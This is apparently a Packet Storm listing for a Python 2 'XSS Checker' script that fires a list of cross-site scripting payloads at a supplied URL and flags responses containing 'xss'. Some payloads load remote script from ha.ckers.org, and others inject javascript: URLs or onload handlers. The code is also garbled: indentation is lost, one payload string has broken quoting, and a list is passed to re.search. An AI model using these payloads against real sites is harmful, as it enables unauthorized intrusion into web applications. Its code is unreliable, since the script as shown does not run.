Cross site scripting fuzzing utility written in Python.
87e7d424c10d56a7fc8c08dc5f96dc2aimport sys,os,re,urllib,urllib2,socket
if len(sys.argv)<2:
print "\n beenudel1986[at]gmail[dot]com"
print "\n\tXSS Checker"
print "\n Usage: xsschecker.py <site>"
sys.exit(0)
site=sys.argv[1]
payload = [ "<script>alert('xss')</script>",
"<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
"<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
"<IMG SRC=javascript:alert('XSS')>",
"<IMG SRC=JaVaScRiPt:alert('XSS')>",
"<IMG SRC=javascript:alert("XSS")>",
"<IMG SRC=`javascript:alert( 'XSS')`>",
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
"<IMG SRC=javascript:alert('XSS')>",
"<IMG SRC=javascript:alert('XSS')>",
"<IMG SRC=javascript:alert('XSS')>",
"<IMG SRC=javascript:alert('XSS')>",
"<<SCRIPT>alert('XSS');//<</SCRIPT>",
"<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>",
"<SCRIPT SRC=//ha.ckers.org/.j>",
"<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>",
"</TITLE><SCRIPT>alert('XSS');</SCRIPT>",
"<BODY ONLOAD=alert('XSS')>"]
reply=["xss","XSS","Xss"]
j=len(payload)
print "[+]Invarients Loaded",j
for payloads in payload:
try:
attack= urllib2.urlopen(site+payloads, "80").readlines()
print "Trying Payload: ",site+payloads
for line in attack:
if re.search(reply,line):
print "\n\tVulnerablity Found"
except(urllib2.URLError, socket.timeout, socket.gaierror, socket.error):
pass
except(KeyboardInterrupt):
pass 
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!